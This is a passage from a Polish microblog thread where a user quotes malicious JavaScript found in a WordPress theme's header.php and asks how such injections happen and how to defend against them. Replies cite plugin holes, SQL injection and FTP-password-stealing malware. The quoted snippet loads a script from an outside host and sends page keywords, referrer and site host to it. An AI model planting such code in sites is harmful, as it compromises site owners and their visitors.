Wpis z mikrobloga

W jaki sposób są infekowane motywy Wordpressa?
W pliku header.php znalazłem takie coś:

var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="[http://www.taylorparadise.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://www.taylorparadise.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function()](http://www.taylorparadise.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://www.taylorparadise.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function()){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}
Interesuje mnie w jaki sposób jest to tam jest umieszczane i jak się przed tym bronić.
Aha, strona nie jest moja. Po prostu interesuje mnie jak to działa :)

#php #webdev #webdevhelp #javascript #wordpress
  • 16
@mariecziek: dziury w wordpressie/pluginach które pozwalają na modyfikowanie plików po stronie serwera czy ich uploadowanie, sqli i możliwość tworzenia plików z bazy danych, złamanie hasła admina i tutaj już w zasadzie można robić co się chce
@Jurigag: Widzisz, strona stoi na hostingu a nie na VPS, więc do shella dostępu nie ma (no ja korzystając z ssh nie moge się podłączyć, mimo że znam hasło).
A za plugin dziękuję ( ͡° ͜ʖ ͡°)
@mariecziek: spotkałem się kiedyś z wirusem, który odczytywał zapisane hasła do FTP w total commanderze i filezilla i dopisywał złośliwy kod do wszystkich plików php/html na serwerze. Mimo, że pracownicy nigdy haseł jawnie nie trzymali, wystarczył jeden głupi freelancer, który trzymał hasła w filezilla i potem mieliśmy zainfekowanych kilkadziesiąt serwisów. Nie polecam ( ͡° ͜ʖ ͡°)
@morq: Widzisz, bezpieczeństwo tam kuleje i serwer jest zawalony masą stron, których nikt nie aktualizuje. Już miałem podobną sytuację, z tym że najpierw serwer zwolnił, a następnie otrzymałem ostrzeżenie z firmy hostingowej, że wyłączą serwer z powodu ataku ddos innych stron internetowych. Wtedy to naprawiłem wywalając różne śmieci.

Od tej pory minęły 3 lata i pewnie nikt nie zmieniał haseł na stronie i FTP oraz niw wywalał zbędnych stron, przez co